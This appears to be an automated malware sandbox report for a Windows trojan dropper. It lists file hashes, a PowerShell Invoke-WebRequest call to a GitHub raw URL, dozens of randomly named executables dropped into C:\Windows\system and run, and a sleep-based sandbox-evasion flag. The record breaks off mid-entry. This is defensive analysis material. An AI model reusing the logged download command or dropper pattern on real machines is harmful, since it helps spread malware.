VirSCAN

1. You can submit files for scanning no larger than 20 MB.
2. VirSCAN scans Rar/Zip archives, but no more than 20 files.
3. VirSCAN can scan archived files protected with the passwords 'infected' or 'virus'.
4. If your browser cannot upload files, please download the VirSCAN uploader.

Basic information

File name: 00谁都有秘密
File size: 2068136
File type: application/x-dosexec
MD5: 41fd78c21175a7e58ea1946742610061
sha1: 1a88fa944bea19dc091cecd28096a5f5b596e42d

CreateProcess

ApplicationName:
CmdLine: powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
childid: 2144
childname: powershell.exe
childpath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
drop_type:
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\pVvHVXx.exe
childid: 2776
childname: pVvHVXx.exe
childpath: C:\Windows\system\pVvHVXx.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\XIunuLE.exe
childid: 1936
childname: XIunuLE.exe
childpath: C:\Windows\system\XIunuLE.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\jXGapzX.exe
childid: 1836
childname: jXGapzX.exe
childpath: C:\Windows\system\jXGapzX.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\tGqMkEe.exe
childid: 2236
childname: tGqMkEe.exe
childpath: C:\Windows\system\tGqMkEe.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\WYAFryj.exe
childid: 2260
childname: WYAFryj.exe
childpath: C:\Windows\system\WYAFryj.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\tEyUWct.exe
childid: 1840
childname: tEyUWct.exe
childpath: C:\Windows\system\tEyUWct.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\QTrpNtY.exe
childid: 2160
childname: QTrpNtY.exe
childpath: C:\Windows\system\QTrpNtY.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\YuFgYGd.exe
childid: 1628
childname: YuFgYGd.exe
childpath: C:\Windows\system\YuFgYGd.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\bjmXdBD.exe
childid: 1476
childname: bjmXdBD.exe
childpath: C:\Windows\system\bjmXdBD.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\CLeZCRX.exe
childid: 952
childname: CLeZCRX.exe
childpath: C:\Windows\system\CLeZCRX.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\GWAmqsL.exe
childid: 2472
childname: GWAmqsL.exe
childpath: C:\Windows\system\GWAmqsL.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\QPZwHlA.exe
childid: 2040
childname: QPZwHlA.exe
childpath: C:\Windows\system\QPZwHlA.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\FiebfRo.exe
childid: 2832
childname: FiebfRo.exe
childpath: C:\Windows\system\FiebfRo.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\nfHJuJN.exe
childid: 1880
childname: nfHJuJN.exe
childpath: C:\Windows\system\nfHJuJN.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\TyMjkQV.exe
childid: 2368
childname: TyMjkQV.exe
childpath: C:\Windows\system\TyMjkQV.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\loAnxnj.exe
childid: 2428
childname: loAnxnj.exe
childpath: C:\Windows\system\loAnxnj.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\evVewtT.exe
childid: 2608
childname: evVewtT.exe
childpath: C:\Windows\system\evVewtT.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\soaakCH.exe
childid: 2764
childname: soaakCH.exe
childpath: C:\Windows\system\soaakCH.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\cepsWcl.exe
childid: 1216
childname: cepsWcl.exe
childpath: C:\Windows\system\cepsWcl.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\dKYPoTY.exe
childid: 1612
childname: dKYPoTY.exe
childpath: C:\Windows\system\dKYPoTY.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\LAoljGR.exe
childid: 2932
childname: LAoljGR.exe
childpath: C:\Windows\system\LAoljGR.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\ZChGZRz.exe
childid: 2680
childname: ZChGZRz.exe
childpath: C:\Windows\system\ZChGZRz.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\nVqBEZq.exe
childid: 1580
childname: nVqBEZq.exe
childpath: C:\Windows\system\nVqBEZq.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\vfTeZBV.exe
childid: 2648
childname: vfTeZBV.exe
childpath: C:\Windows\system\vfTeZBV.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\sjvOSaD.exe
childid: 2636
childname: sjvOSaD.exe
childpath: C:\Windows\system\sjvOSaD.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\xHbIQiT.exe
childid: 1860
childname: xHbIQiT.exe
childpath: C:\Windows\system\xHbIQiT.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\eazKPGK.exe
childid: 2356
childname: eazKPGK.exe
childpath: C:\Windows\system\eazKPGK.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine: C:\Windows\System\STZCYrB.exe
childid: 2704
childname: STZCYrB.exe
childpath: C:\Windows\system\STZCYrB.exe
drop_type: 1
name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
pid: 2440
ApplicationName:
CmdLine:
childid: 2440
childname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
childpath: C:\Users\Administrator\AppData\Local\Temp\1618997412964_41fd78c21175a7e58ea1946742610061.exe
drop_type:
name:
noNeedLine:
path:
pid: 1928

Summary

buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 2144
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList

Behavior_analysis

message: Attempts to evade sandbox detection by sleeping for a long time
name: Long sleep
szSubkey:
score: 2

Dropped_Save

analysis_result: Safe
create: 0
how: move
md5: f9038ec966b89c3ed51c156bd54fe14b
name: 590aee7bdd69b59b.customDestinations-ms
new_size: 7960bytes
operation: Copy and overwrite file
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
processid: 2144
processname: powershell.exe
sha1: 5c51a2d53285cf47905ffd529193167501cad241
sha256: 4db7d9f14e08e9dd52ef96e8feac91e54d2b10631967061847d00f05ca709706
size: 7960
this_path: /data/cuckoo/storage/analyses/2000083/files/1018/590aee7bdd69b59b.customDestinations-ms
type: data

Dropped Unsave

analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 7d0afac75731dd35f2a611f4e551bae4
name: pVvHVXx.exe
new_size: 2019KB (2068136bytes)
operation: Modify file
path: C:\Windows\system\pVvHVXx.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 33dafeb6e3a943e9eef3bc5075b9fea134d65f22
sha256: fbc4cf694659e9aade59519ed0a8c7df3d25f08554774892cf5f881082abc29e
size: 2068136
this_path: /data/cuckoo/storage/analyses/2000083/files/1000/pVvHVXx.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6c6847e49fe894aeadb6e19b9db040a6
name: XIunuLE.exe
new_size: 2019KB (2068389bytes)
operation: Modify file
path: C:\Windows\system\XIunuLE.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 84e7dfe4def8fe64842eccd6e558fb0768584701
sha256: 08c613b1944498843d56f459bf74452eaf9538269a8c466b630266d8c3f56139
size: 2068389
this_path: /data/cuckoo/storage/analyses/2000083/files/1001/XIunuLE.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 9e4e1803eb9798b7c4d36c02df1fdf51
name: jXGapzX.exe
new_size: 2020KB (2068642bytes)
operation: Modify file
path: C:\Windows\system\jXGapzX.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 2ba29e9878f694190c450f9ea4c515074451e414
sha256: d45ac62ad624cd52959f0692119df64e8204c0e42d804f8b0cfb2c8810f45998
size: 2068642
this_path: /data/cuckoo/storage/analyses/2000083/files/1002/jXGapzX.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: fa874c6d03e2937a3a68056e95bbffb4
name: tGqMkEe.exe
new_size: 2020KB (2068895bytes)
operation: Modify file
path: C:\Windows\system\tGqMkEe.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: c908caedda79e074fd468c7a4db30654b8b1c944
sha256: 5629c47d9ef9a50926c639fe6dcf5510e4ba5b0c73d097134ef7f52a36b26902
size: 2068895
this_path: /data/cuckoo/storage/analyses/2000083/files/1003/tGqMkEe.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 2dfe956b3634d9e5b4f367255220c8aa
name: WYAFryj.exe
new_size: 2020KB (2069148bytes)
operation: Modify file
path: C:\Windows\system\WYAFryj.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: b8d70550b25ba8cccf3e4fcdf7777ca851411999
sha256: 69fb3dcdbcac185e57ce5c5ff8df5f235c56a8ad5f34b59f3083d74b69ea3439
size: 2069148
this_path: /data/cuckoo/storage/analyses/2000083/files/1004/WYAFryj.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: e523496ecc8ac6406ebe4bc6fefe39fd
name: tEyUWct.exe
new_size: 2020KB (2069401bytes)
operation: Modify file
path: C:\Windows\system\tEyUWct.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: de678d67108b6cc278b15ae53c730a548cae285a
sha256: f851e137e7c6a083da293e7de5768a61653be76befb757da1e61ba1b23aed124
size: 2069401
this_path: /data/cuckoo/storage/analyses/2000083/files/1005/tEyUWct.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: cf7b24990c301fe6d20b719b27077f82
name: QTrpNtY.exe
new_size: 2021KB (2069654bytes)
operation: Modify file
path: C:\Windows\system\QTrpNtY.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 6c9952fd2baa243c576b990f2c4c3cad05d76145
sha256: 52ecd234de9b1e0bd3db563a5fa2106b995b3e8da911ef7e5a5a7c7e3d1811f6
size: 2069654
this_path: /data/cuckoo/storage/analyses/2000083/files/1006/QTrpNtY.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: f4efcd1b7a41be3fee04bf75d17c9ba0
name: YuFgYGd.exe
new_size: 2021KB (2069907bytes)
operation: Modify file
path: C:\Windows\system\YuFgYGd.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 084884db82c5167d6398e2a661962f1b0896ef88
sha256: 0442245407b7ecf80acc2368e817c88c5246f0e3f0df9188c8f307aeb3d770dd
size: 2069907
this_path: /data/cuckoo/storage/analyses/2000083/files/1007/YuFgYGd.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: fc1509e1e959da7694325811eb29b8aa
name: bjmXdBD.exe
new_size: 2021KB (2070160bytes)
operation: Modify file
path: C:\Windows\system\bjmXdBD.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 363c6e4cfc8735f26e98ffce56e737b605c3ab31
sha256: 56f97b91475fdb3bfbba77533cfc082e48093d4dae5aea7c373a3597a18769cb
size: 2070160
this_path: /data/cuckoo/storage/analyses/2000083/files/1008/bjmXdBD.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 416ad17cc4b5729588a07cd8ad50b24c
name: CLeZCRX.exe
new_size: 2021KB (2070413bytes)
operation: Modify file
path: C:\Windows\system\CLeZCRX.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 8bc496c33bc233214507761a90bfea145f66d313
sha256: bf8cce6bb7aaa66699e5bb3e89963b6cf2a77b40fa818e29bebf97553d1e7b74
size: 2070413
this_path: /data/cuckoo/storage/analyses/2000083/files/1009/CLeZCRX.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: b3f8641d689102a114d176cc46cf1a2b
name: GWAmqsL.exe
new_size: 2022KB (2070666bytes)
operation: Modify file
path: C:\Windows\system\GWAmqsL.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f18383576c3de34674c824ceda85515157c2b03e
sha256: 0440aad59e90972d5d3072c4d8248288cb0ffc57421cf29b2d8493a9d8e4b24a
size: 2070666
this_path: /data/cuckoo/storage/analyses/2000083/files/1010/GWAmqsL.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3eb8b02bfdb0cc119b4336f94671f896
name: QPZwHlA.exe
new_size: 2022KB (2070919bytes)
operation: Modify file
path: C:\Windows\system\QPZwHlA.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: d0a8d8ecbaf722818d3bb37c97d2e7ea1f54d2dc
sha256: b81b4119cf9a64eaa263965813935cee43de566ccaec8d90cb8db89b9f56be53
size: 2070919
this_path: /data/cuckoo/storage/analyses/2000083/files/1011/QPZwHlA.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3a1f748fe0c3a550d9538a9901ef1951
name: FiebfRo.exe
new_size: 2022KB (2071172bytes)
operation: Modify file
path: C:\Windows\system\FiebfRo.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 3e91b9daaa71cea93f6c913769af4c4d18d8ab4e
sha256: 953ed82a14f7feacef751967105a736794ac193e294f2a8d5bcca44be081006c
size: 2071172
this_path: /data/cuckoo/storage/analyses/2000083/files/1012/FiebfRo.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6bbe2cb903434c47e39aa62ce117871e
name: nfHJuJN.exe
new_size: 2022KB (2071425bytes)
operation: Modify file
path: C:\Windows\system\nfHJuJN.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 830b4e159b13c602d091633628106253fa6632bd
sha256: c8731316e9806d6f6b0cb66b5ac21e1dcb6e04cfd36a426ef4dd58e4a67bd736
size: 2071425
this_path: /data/cuckoo/storage/analyses/2000083/files/1013/nfHJuJN.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 905ea2f69cf0351045b2f477f3e4b955
name: TyMjkQV.exe
new_size: 2023KB (2071678bytes)
operation: Modify file
path: C:\Windows\system\TyMjkQV.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 96c11822c8e467f8dde17e6b11a5a4c34e79586c
sha256: faefeeb6b34341475dccdb934636178e2caca902382a38d0a4678cd7a9909955
size: 2071678
this_path: /data/cuckoo/storage/analyses/2000083/files/1014/TyMjkQV.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 192160161ef4cf6aed964187952848bf
name: loAnxnj.exe
new_size: 2023KB (2071931bytes)
operation: Modify file
path: C:\Windows\system\loAnxnj.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 35aa38778f7f96184d250df13e5506e6990b8606
sha256: 652498fb4d33a230a34f94f6ab1d8bb90b898b9ef3804efab32ee9b3c73d2ab0
size: 2071931
this_path: /data/cuckoo/storage/analyses/2000083/files/1015/loAnxnj.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: be21434b5404b5eddf3c7d72d18e2cd4
name: evVewtT.exe
new_size: 2023KB (2072184bytes)
operation: Modify file
path: C:\Windows\system\evVewtT.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 3dcf24dd89888bce1c69211934052cd198f0c625
sha256: 77942046199c56e8ab10c600df720d62719be1eacb4a120a2b7039e4327948cf
size: 2072184
this_path: /data/cuckoo/storage/analyses/2000083/files/1016/evVewtT.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 8e0dcac874906126b3f234762ef7dc36
name: soaakCH.exe
new_size: 2023KB (2072437bytes)
operation: Modify file
path: C:\Windows\system\soaakCH.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: df03d8f6434b14badb3c793d81939871951e8ade
sha256: 400d52d87e4a24c34fda2b699580dc1dd0e3110d693dd530146583341583a21d
size: 2072437
this_path: /data/cuckoo/storage/analyses/2000083/files/1017/soaakCH.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3a8c3086f54ad3305756d77b52cb53a8
name: cepsWcl.exe
new_size: 2024KB (2072690bytes)
operation: Modify file
path: C:\Windows\system\cepsWcl.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: e466d25d3e7d582bb7673f424166134a56eb1066
sha256: 6910eaf1b8d09c2c1d3280c214f5b6161c12ac0082c7f5b1a3cd1ba113da36a0
size: 2072690
this_path: /data/cuckoo/storage/analyses/2000083/files/1019/cepsWcl.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 5999ff4e74cbccd492be21061af5550f
name: dKYPoTY.exe
new_size: 2024KB (2072943bytes)
operation: Modify file
path: C:\Windows\system\dKYPoTY.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f2e755f3e8eb64ff6ecbe5f9b23198268504b0f8
sha256: c0b5bd308f4765c817a2def27789906d3fcb1c72c0a8fa79d8d944fca90cc957
size: 2072943
this_path: /data/cuckoo/storage/analyses/2000083/files/1020/dKYPoTY.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 861773b572d19976b30dc914d960d03b
name: LAoljGR.exe
new_size: 2024KB (2073196bytes)
operation: Modify file
path: C:\Windows\system\LAoljGR.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: eb214c56e1d4dd1a4a3731909bc3092cfa5c47fd
sha256: f8583a8b13184945293bdb30bd78fcace3b214b4f96156b6ed11dc1840836fdd
size: 2073196
this_path: /data/cuckoo/storage/analyses/2000083/files/1021/LAoljGR.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 584de2a81dc73cfbf5cdcb3e987fda74
name: ZChGZRz.exe
new_size: 2024KB (2073449bytes)
operation: Modify file
path: C:\Windows\system\ZChGZRz.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 22dd5cd9abe99061841c1fa73beba84085d87b0b
sha256: 226c7d4547c6e88a2872a37c58870980d35f2a67b1d4a55ad755df79a189874f
size: 2073449
this_path: /data/cuckoo/storage/analyses/2000083/files/1022/ZChGZRz.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 19e7bd2b742fbd3f14ec41526008dfe9
name: nVqBEZq.exe
new_size: 2025KB (2073702bytes)
operation: Modify file
path: C:\Windows\system\nVqBEZq.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: c4cd1d955cffa7a57cf3d7149c60fea4dfffbc5b
sha256: f93b30434c2b0a2b32512a4922d78d11ce52117dbe715bdc836bb4a5fcc68169
size: 2073702
this_path: /data/cuckoo/storage/analyses/2000083/files/1023/nVqBEZq.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: fd3a5adce27196659899cf317cfb4b7b
name: vfTeZBV.exe
new_size: 2025KB (2073955bytes)
operation: Modify file
path: C:\Windows\system\vfTeZBV.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f6e47f38fa841dc2bc683e08d0ce601c50e05318
sha256: ef2ed9bf0c373b735b946429d499575eac6644eba65f277879d6650014d96568
size: 2073955
this_path: /data/cuckoo/storage/analyses/2000083/files/1024/vfTeZBV.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: b7bcb9e1a73a3fa87373b67d477e7db0
name: sjvOSaD.exe
new_size: 2025KB (2074208bytes)
operation: Modify file
path: C:\Windows\system\sjvOSaD.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f197c3edb99b5dda756c638b89f4a4d8cbbe7840
sha256: cb7d38d2cb679dbaa32f1e3a40271c7c94da92c9780318ec2ce397ede6a95a6d
size: 2074208
this_path: /data/cuckoo/storage/analyses/2000083/files/1025/sjvOSaD.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: ba3d249ef178d9b7d8666e5edd0ee7dc
name: xHbIQiT.exe
new_size: 2025KB (2074461bytes)
operation: Modify file
path: C:\Windows\system\xHbIQiT.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 2cc07c136570179026d2742cdd1bd1df36b3971f
sha256: 1da85ccb42545b54ac7df9064f4d462ca8648795158995d0533de3a8e0521ef0
size: 2074461
this_path: /data/cuckoo/storage/analyses/2000083/files/1026/xHbIQiT.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 441e582e0955f076edeaa84d2df0bd27
name: eazKPGK.exe
new_size: 2026KB (2074714bytes)
operation: Modify file
path: C:\Windows\system\eazKPGK.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 15393a718910f0f724cecde4b68e20f7793860fd
sha256: af72f9381d5461d42afa54fe6c45ce144a8fbc6d9d7e5cf4d18cd3b049f1369d
size: 2074714
this_path: /data/cuckoo/storage/analyses/2000083/files/1027/eazKPGK.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 04d16e07f390785d08fab9a5023ca1ff
name: STZCYrB.exe
new_size: 2026KB (2074967bytes)
operation: Modify file
path: C:\Windows\system\STZCYrB.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 41f82c4b7f5a78343c6d383bf1122bf7a36993d4
sha256: a888d0d63591b751515977ae12b6007a3e908d49ca18e51dd55a2bf8185dbb5f
size: 2074967
this_path: /data/cuckoo/storage/analyses/2000083/files/1028/STZCYrB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 7855cbd45ce93a65f29054c2c1d22ffc
name: MjEVFLO.exe
new_size: 2026KB (2075220bytes)
operation: Modify file
path: C:\Windows\system\MjEVFLO.exe
processid: 2440
